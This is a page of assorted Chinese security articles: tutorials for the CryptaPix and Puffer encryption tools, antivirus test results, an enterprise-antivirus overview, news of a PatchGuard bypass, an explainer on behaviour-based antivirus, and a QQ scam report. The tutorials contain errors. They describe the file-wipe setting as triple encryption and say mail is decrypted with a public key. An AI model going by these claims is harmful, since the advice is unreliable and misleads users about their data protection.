技巧实战用CryptaPix给你的图片加密码

作者：hackmaster　来源：赛迪网安全社区

很多人电脑中都有私人照片，特别是一些比较重要的证据图片和人物照片等，如果不希望自己的照片被别人随意看到，可以使用CryptaPix软件对图片进行加密，它是一个不错的看图工具，还提供多种对图片的Blowfish加密算法　避免你个人收集的图片被人偷看。

BlowFish加密算法

　　软件的加密方式有RSA、ElGamal、DSA以及Blowfish等加密算法，BlowFish算法用来加密64Bit长度的字符串，它使用两个“盒”——Ungigned Long Pbox[18]和Unsigned Long Sbox[4,256]。BlowFish算法中，有一个核心加密函数BF_En，该函数输入64位信息，运算后，以64位密文的形式输出，用BlowFish算法加密信息，需要密钥预处理和信息加密两个过程，信息加密就是用函数把待加密信息x分成32位的两部分:xL,xR BF_En对输入信息进行变换，我们要加密一个信息，需要自己选择一个Key，用这个Key对Pbox和Sbox进行变换，得到下一步信息加密所要用的Key_pbox和Key_sbox，信息解密的过程就是把信息加密过程的Key_pbox逆序使用即可。

　　从以上可以看出，选择不同的Key，用BlowFish算法加密同样的信息，可以得出不同的结果，要破解BlowFish算法，就要得到BlowFish算法的Key。所以，使用BlowFish算法进行加密，最重要的也就是Key的选择以及Key的保密，其中key的选择可以使用Bf_sdk中的_WeakKey函数进行检验。

CryptaPix 2．24功能介绍

　　CryptaPix 2.24可以浏览我们常用的图片格式，还支持图片打印输出、支持数码相机、DV机以及摄像头直接拍摄图片进行加密，当然它最大的特点还是采用了Blowfish 加密技术，经过加密后的图片，如果没解密密码，就无法查看加密的图片。

对图片进行加密

　　首先我们来进行基本参数优化设置，进入软件“Options”菜单的“Prefereces”选项（如图1），在此设置面板中，上面部分是设置主界面的窗口显示状态，默认情况下不需要设置，“Transition”是用来设置图片连续播放的过渡效果，这个功能很类似幻灯片的播放，“Frame delay”是设置图片播放的延迟时间，比如设置为10，那么图片会每隔10秒按照顺序播放已经选定的图片，“Bar width”设置图片显示的边框大小，这里最重要的是“File wipe method”选项，如果选择“1-PASS”的话，那么只使用一个密钥对图片进行加密，我们在进入的时候只要输入一个密钥即可。如果选择“3-PASS DOD”，则可对图片进行三重加密，三重加密可以设置3个不同的密钥码，这样别人就很难破解你的加密图片了，“Password timeout”是设置密钥超时的，如果输入密钥的时间超过了设置时间，会提示密钥输入超时，最后设置加密文件的保存路径即可。

图1 参数优化设置

　　返回主窗口，进入“File Mgr”面板，然后把目标定位到你需要加密图片的文件夹下，用鼠标双击一个图片，就会在右边窗口中显示该图片出来，鼠标右键选择需要加密的图片名称或点“Ctrl+A”全部选中。在弹出的菜单中选择“Encrypt”进入加密密钥设置窗口，进入后可设置加密方式以及是否包括WAV声音文件的加密，“Source Files”中可选择加密后原文件是否保留还是删除等，在下面的两个空白框中输入相同的密码（如图2），按“OK”按钮后进入加密文件的保存设置，接着继续按“OK”按钮即可。

图2 密钥设置

浏览加密图片

　　经过以上对图片的加密，会在被保存的目录下自动生成带有.cpx后缀的文件，这就是被加密后的加密文件，这样的图片文件只有使用此软件才能够浏览，此时我们可以进入该目下下把原文件删除只保留被加密后的文件，因为原文件图片不是加密的数据文件，别人一样可以直接浏览原文件图片。让我们自己要浏览加密后的图片时，只要运行软件，找到加密的文件，用鼠标双击文件后会提示你输入密码，输入密码后才能浏览图片，然后也可以对图片进行修改，编辑等工作。

为你的邮箱加把锁用Puffer加密邮件设置

作者：hackmaster　来源：赛迪网安全社区

Puffer是一款功能强大的电子邮件加密软件，它采用公开密钥加密，用户只要记住自己的口令就可以安全加密和解密；可以将文件加密成各种格式，加密后的文件可以是文本文件、二进位文件或可执行文件；可以在任何E-mail软件窗口中调用Puffer进行加/解密。

图1

图2

　　运行软件，单击界面中的“Keys”图标进入Key管理界面，单击“File”下的“New”选项新建一个公开密钥文件，接着在弹出的“保存文件”对话框中输入保存文件名和路径。

图3

　　单击Key管理界面的“Create”图标，然后弹出的界面中输入你的姓名和E-mail地址（如图1），Key Expiration Date则是用来设置公开密钥的使用期限，超过这个日期公开密钥就宣告失效。点“OK”按钮后弹出加密密码口令设置窗口，设置完成后系统将开始建一个新的公开密钥（如图2），你只要将此密钥文件寄给向你发送E-mail的人，对方用Puffer将E-mail内容按你的公开密钥加密，就可以作为电子邮件的附件寄给你了。

　　当你收到别人给你发送使用你的公开密钥加密过的电子邮件，你需要进行解密才能阅读。进入Puffer软件主窗口（如图3），设置好待解密的文件来源和解密后的文件输出方式，然后单击“Decrypt”按钮。此时将出现一个对话框，让你选择解密使用的公开密钥并输入相对的口令。单击解密窗口中的“Key Ring”按钮，在跳出的文件选择对话框中，选择保存有你自己的公开密钥的文件。在“输入口令”框中输入创建公开密钥时设置的口令，最后单击“Decrypt”按键即可将加密的文件解密，我们就可以阅读加密的邮件了。

杀毒软件测试: 微软OneCare倒数第一

杀毒软件测试: 微软OneCare倒数第一

太平洋电脑网

作者：BlackWing

　　一奥地利反病毒研究人员表示，在17个参与针对数百种蠕虫、病毒、木马和其它恶意软件的杀毒软件测试中，微软的Windows Live OneCare排名最后。

　　AV Comparatives网站每季度都会推出流行杀毒软件针对动态更新的多达50万种恶意软件的测试结果。

　　据网站维护人Cleminti的测试结果显示，成绩最好的是G Data Security的AntiVirusKit（AVK），99.5％的恶意软件都逃不过它的拦截；第二名是AEC的TrustPort AV WS，查杀率为99.4％；Avira的AntiVir PE Premium以98.9％排名第三；以后的几名分别为：MicroWorld的eScan Anti-Virus，97.9％；F-Secure，97.9％；卡巴斯基，97.9％。

　　而其它比较有名的杀毒产品如赛门铁克的Norton Anti-Virus和McAfee的Virus Scan相应的查杀率分别为96.8％和91.6％。

　　垫底的是微软的Live OneCare，只能查杀82.4％的恶意软件。

　　Cleminti还对这17个参加测试的产品进行了多态病毒（polymorphic viruses）的防御测试，这种病毒为了躲避查杀会衍生出大量的变体。测试结果显示，只有赛门铁克的Norton AntiVirus和ESET的NOD32杀毒软件能够捕获提供测试的12个多态病毒家族中的每个变体。而OneCare在这项测试中排名15。

　　Cleminti的详细报告可以到这里下载。

　　这也不是微软的安全产品第一次被批了，就在前一周，澳大利亚的安全公司PC Tools就公布了一份研究报告，报告称微软的Windows Defender反间谍软件只能识别46％到53％的间谍软件。

　　而微软的发言人表示，他们会仔细研究这次测试的方法跟结果以确保Windows Live OneCare在未来的测试中表现的更好。

卡巴斯基称Vista将主宰恶意软件的进化

太平洋电脑网

作者：BlackWing

　　据杀毒软件厂商预测，在未来几年内，Vista将成为影响恶意代码发展的重要因素。

　　在卡巴斯基公布的年度报告中，它预计在未来几年，Vista将成为恶意软件进化的决定性因素。

　　同时它还预测，针对Mac OS X和Unix系统的恶意软件数量也会明显的增加。

　　而随着如PS等游戏机的增多和它们网络网络功能的丰富，游戏机也慢慢会引起病毒作者的注意。

　　作者表示，目前这些攻击应该还是局限于概念严重代码的阶段，暂时威胁不大。

　　卡巴斯基表示，今年针对大中型企业的针对性攻击也会上升，而通过对用户电脑上的数据进行加密直到用户支付金钱后才把数据恢复给用户的敲诈方式也将成为主要的作案手段之一。它表示，微软Office的文档会成为主要的感染目标。

　　报告还表示，垃圾邮件的前景依然暗淡，用户面对的还是没完没了的垃圾邮件。

换个角度 从企业级用户需求看杀毒软件

作者：lvvl　来源：赛迪网安全社

　对于企业网络而言，一旦有网络病毒的威胁，受到攻击的可能不仅仅是一台的计算机，所有在局域网内的电脑都有可能成为牺牲品，在出现了不计其数的企业员工电脑大面积感染病毒瘫痪的事件之后，网络安全终于被充分地重视。

　　除了必备的安全网关、防火墙等大型设备之外，对于企业用户来说，杀毒软件是除硬件防火墙之外最有力的补充，不仅仅因为最易管理而且占用资源比较少，更重要的是它在企业中的作用可以体现在每个终端，可保护局域网内部的安全。

　　不过对于使用个人版杀毒软件的用户来说，个人版杀毒软件可以实现企业版绝大部分的功能，那么为什么企业版无论在价格上要高出那么多呢？这就要从企业版杀毒软件的定义说起。

企业版杀毒软件的定义

　　至于什么是企业版杀毒软件，尚且缺少一个有力的定义，笔者个人认为对于企业版杀毒软件来说，一定要将定义分成两个部分：

　　1、针对中小企业的杀毒软件：适用于单一的中、小型企业网络，工作站点限制在100个计算机节点以内，单级管理，只支持单系统中心--通过唯一的1个系统中心进行统一管理，提供灵活、快捷的网络防病毒支持；

　　2、针对大型企业的杀毒软件：就是适用于复杂、跨平台、跨网段、跨地域的企业级网络，没有工作站点的限制，可以实施多级管理，同时可支持多系统中心--通过主系统中心对各个子系统中心的逐级管理，尤其对跨网段、跨区域的分支机构可全面实现统一、远程、智能化等管理等的杀毒软件。

与个人版杀毒软件的不同

　　抛开杀毒引擎和产品接口不同等技术层面不谈，所谓企业版杀毒软件，其与个人版杀毒软件最本质的区别就在于，企业版杀毒软件照顾到的是局域网内的每一台PC，而个人版杀毒软件只负责管好自己的“一亩三分田”。

　　企业版杀毒软件的构成与价格体系 通常的企业版杀毒软件包括三个部分：系统中心、服务器端和客户端。一般来说根据企业大小的不同，用户可以购买不同数目的客户端。总的来看，在购买不同数目的客户端价格也有所不同，国内厂商的中小企业版系统中心和服务器端的价格大概在2000元左右，一个客户端大概在300元左右，大型企业版基本上价格翻倍。而国外产品价格稍高，不过与国内产品相差不多。

　　我们可以见到不少网友喜欢用企业版杀毒软件，但是我们在电脑上看到的那个只是客户端，真正的管理端是在接入的服务器上，网管们可以进行管理。与各自品牌相应的个人版相比，企业版杀毒软件的客户端资源占用较少，自定义选项较个人版少，但是灵活、快捷，反应迅速，易于操作。

总结

　　平心而论，在企业版杀毒软件方面，国外厂商一直走在国内厂商的前面，而且拉开的距离不止是一两步，像赛门铁克、Mcafee、卡巴斯基等企业版产品无论是在国内还是在国外都拥有大量的“粉丝”。在国外厂商中，赛门铁克旗下的诺顿品牌和Mcafee目前在国内的口碑最好。根据笔者所能接触到的用户反映，诺顿和趋势的企业版杀软在管理方面相当出色，而Mcafee的防护比较强只是在设置上比较复杂，不易于管理。不过企业真正购买的话还需要专门的安全技术人员根据企业的规模和需要制定解决方案以选择最适合的产品。

针对Vista赛门铁克指出其内核存在问题

作者：hackmaster　来源：赛迪网安全社区

赛门铁克对微软Windows Vista安全特性——尤其是64位内核保护技术PatchGuard——的态度是众所周知的，连续多份Vista安全报告也是毫不留情地持续分析Vista的弱点。今天，赛门铁克又在其官网上公布了一份Vista安全白皮书，在其中令人震惊地给出了独立研究人员对Vista Beta中PatchGuard技术的破解演示的链接地址，还有相关源代码。

2005年12月，Uniformed.org发表了题为“绕过Windows x64的PatchGuard”的PDF白皮书发，但一直没有受到太多关注，而在一份16页的Vista安全技术分析报告中，赛门铁克以脚注的形式给出了上述白皮书的链接地址。第9页的相关语句为：“一如Windows Vista开发和发布过程中演示的那样，黑客可以而且会破解PatchGurad。”

破解白皮书的作者之一Ken Johnson(Skywing)是一位专业开发人员，也是微软MVP。他并不是专业黑客，只是业余爱好研究合法的逆向工程，而其工作是开发Windows虚拟专用网络软件。出于发现问题、给出解决方案的思路，Ken Johnson及合作者还在白皮书中给出了对付每一个破解方案的所需技术，而这些技术都可能会被微软用来增强Vista。

赛门铁克在自己的报告中提到了Ken Johnson的工作，并继续“嘲讽”PatchGuard等安全技术，声称“这些技术也许会放慢黑客的脚步，但终究不是长久之计”。赛门铁克称：“结果显示，经过一人一星期的适当努力，PatchGuard和代码签名检查、底层驱动认证三种技术可以被永久性屏蔽，并从Vista中移除。即使(Vista)用户可能只是犯了一个小错误，也可能成为类似安全威胁的受害者。”

这么说还不够，赛门铁克随后就演示了如何关闭Vista的一些安全特性，比如帐户控制UAC等。



安全知识 探讨主动防御型杀毒软件技术

作者：hackmaster　来源：赛迪网安全社区

间谍程序、游戏木马、黑客程序等网络病毒的频频爆发，使国内外反病毒领域开始意识到，单纯依靠“特征码技术”已经不能适应反病毒需求。 那么什么是“主动防御”，它的实现技术又是怎样的呢?

所谓“主动防御”，就是全程监视进程的行为，一但发现“违规”行为，就通知用户，或者直接终止进程。它类似于警察判断潜在罪犯的技术，在成为一个罪犯之前，大多数的人都有一些异常行为，比如“性格孤僻，有暴力倾向，自私自利，对现实不满”等先兆，但是并不是说有这些先兆的人就都会发展为罪犯，或者罪犯都有这些先兆。因此“主动防御”并不能100%发现病毒，它的成功率大概在60%-80%之间。如果再加上传统的“特征码技术”，几乎可以发现100%的恶意程序了。在国外，诺顿，Kaspersky，McAfee等等杀毒巨头，都已经向“主动防御”+“特征码技术”过渡了，这是杀毒软件的必然发展趋势。

防火墙是一个运用“主动防御”技术的典型例子，大家都用过防火墙了，对于防火墙经常询问用户是否放行一个进程访问网络，或者有不明连接进入本机而发出警告是否印象深刻呢?其实防火墙就是在全程监视进程的网络行为，一但发现违反规则的行为就发出警告，或者直接根据用户设定拒绝进程访问网络。当然，现在的防火墙一般都把系统网络进程(比如services.exe，svchost.exe，lsass.exe等)记在“受信名单”里，这些进程是默认允许访问网络的，如果禁止的话，操作系统就不正常了，这也是现在很多病毒和木马都喜欢远程注入这些系统进程以突破防火墙而访问网络的原因。

下面重点说一下“主动防御”的实现技术。大家都写过程序，知道在一个程序里如果要实现自己的功能就必须要通过接口调用操作系统提供的功能函数，在DOS里几乎所有的系统功能或第三方插件都是通过中断提供的，在WINDOWS里一般是通过DLL里的API提供，也有少数通过INT2E或SYSENTER提供。一个进程有怎么样的行为，通过看它调用了什么样的API就大概清楚了，比如它要读写文件就必然要调用CreateFile()，OpenFile()，NtOpenFile()，ZwOpenFile()等函数，要访问网络就必然要使用Socket函数。因此只要挂接系统API(尽量挂接RING0层的API，如果挂接RING3层的API将有可能被绕过)，就可以知道一个进程将有什么动作，如果有危害系统的动作该怎么样处理等等。例如瑞星杀毒，大家可以在它的安装目录里找到几个驱动文件，其实这些驱动就是挂接了ntoskrnl.exe，ndis.sys等系统关键模块里的API，从而对进程的普通行为，网络行为，注册表行为进行监视的。

最后让我们设想一下一个“主动防御”型杀毒软件的一般流程:通过挂接系统建立进程的API，杀毒软件就在一个进程建立前对进程的代码进行扫描，如果发现SGDT，SIDT，自定位指令(一般正常软件不会有这些指令)，就提示，如果用户放行，就让进程继续运行;接下来监视进程调用API的情况，如果发现以读写方式打开一个EXE文件，可能进程的线程想感染PE文件，就发出警告;如果收发数据违反了规则，发出提示;如果进程调用了CreateRemoteThread()，则发出警告(因为CreateRemoteThread()是一个非常危险的API，正常进程很少用到，倒是被病毒木马用得最多)。...。可以想象，未来我们运行程序可能要被提示多次，访问网络也被提示多次，各种各样的提示将大多数人搞的昏头转向。想安全就要管严，放松就不安全了!

12590借元宵节敛财 专家呼吁法律制裁

12590借元宵节敛财 专家呼吁法律制裁

CNET科技资讯网 【转载】

如果你收到QQ好友发过来的拨打12590点播元宵节祝福的信息,千万不要信以为真,这仅是一些不良SP厂商敛财的一种手段。

"我的一个QQ好友发来信息,说给我点了一首歌,只要拨打12590就可以收听,结果我拨打了这个号码后,一下子花费了10几块钱,最可气的是,我的朋友根本就没有给我发过类似的信息。"北京的朱女士无奈的表示。



很多QQ用户在收到类似的信息的同时,第一时间想到的就是电脑中了病毒,据金山毒霸反病毒专家戴光剑表示,根据12590垃圾信息的传播特点,主要有两种可能性:1、12590先利用盗号类病毒盗取QQ帐号密码，然后群发给QQ帐号中的所有好友；2、12590直接通过病毒向QQ用户发送敛财信息。但由于传播病毒是国家法律名令禁止的，所以前一种方式的可能性更大。

据了解，12590已在网络上散播数日，而且愈演愈烈，据相关机构调查显示，一些重要节日期间，70%的QQ用户都曾遭遇过类似的骚扰信息。

专家建议广大用户，如果收到类似12590点播信息，应第一时间通知发送信息的好友，修改QQ密码并利用杀毒软件进行全面扫描，确保电脑安全。